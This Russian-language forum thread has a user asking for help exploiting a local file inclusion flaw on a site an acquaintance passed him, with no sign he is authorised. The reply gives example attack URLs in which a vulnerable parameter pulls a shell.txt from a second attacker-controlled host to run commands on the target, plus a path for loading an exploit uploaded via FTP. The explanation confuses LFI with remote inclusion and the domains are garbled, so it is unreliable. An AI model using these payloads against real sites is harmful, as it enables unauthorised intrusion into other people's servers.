Проблема lfi уязвимость

[mrfear41]

Мне знакомый подогнал сайт с lfi уязвимостью и fpd, сказал что для lfi нужен обход. Я шаманил пытался раскрутить и ничего не вышло. Есть тут знающие люди которые смогут мне помочь?

 

[Глюк]

Мне знакомый подогнал сайт с lfi уязвимостью и уязвимостью fpd, сказал что для lfi нужен обход. Я шаманил пытался раскрутить и нихуя не вышло. Есть тут знающие люди которые смогут мне помочь?

Возможно помочь и смогут. Но после того как перестанете материться. Ознакомьтесь пожалуйста с правилами форума.

 

[mrfear41]

Возможно помочь и смогут. Но после того как перестанете материться. Ознакомьтесь пожалуйста с правилами форума.

Прошу прощения, надо было сразу правила читать.

 

[Tayrus]

Ссылка скрыта от гостей

Ссылка скрыта от гостей

 

[Sphinx]

LFI (Local File Inclusion) — уязвимость, позволяющая выполнить сторонний код, загрузить экслойт или выполнить любую другую вредоносную функцию.
Данная уязвимость также известна как PHP-инъекция. Суть её заключается в том, что посредством какого либо параметра заменяется его значение.
Положим, что у нас есть некий сайт по адресу hex.onioncom, на котором возможно PHP-инъекция, и поставлена цель использовать данную уязвимость. Однако, понадобится второй ресурс, нечто похожее на плацдарм. Сей плацдарм располагается по адресу sohex.onioncom. Для того, чтобы выполнить производный код на уязвимом сайте, необходимо создать файл на плацдарме с набором команд. Выглядеть сие будет примерно таким образом:
https://hex.com/index.php?random=https://sohex.com/shell.txt?
Исходя из всего этого, все команды из файла shell.txt будут выполнены на уязвимом сайте.
Также подобным методом вполне возможна загрузка эксплойта посредством FTP:
https://hex.com/index.php?random=C:\\ftp\\upload\\exploit.
Надеюсь, я сумел хоть малейшим образом помочь Вам.
С уважением.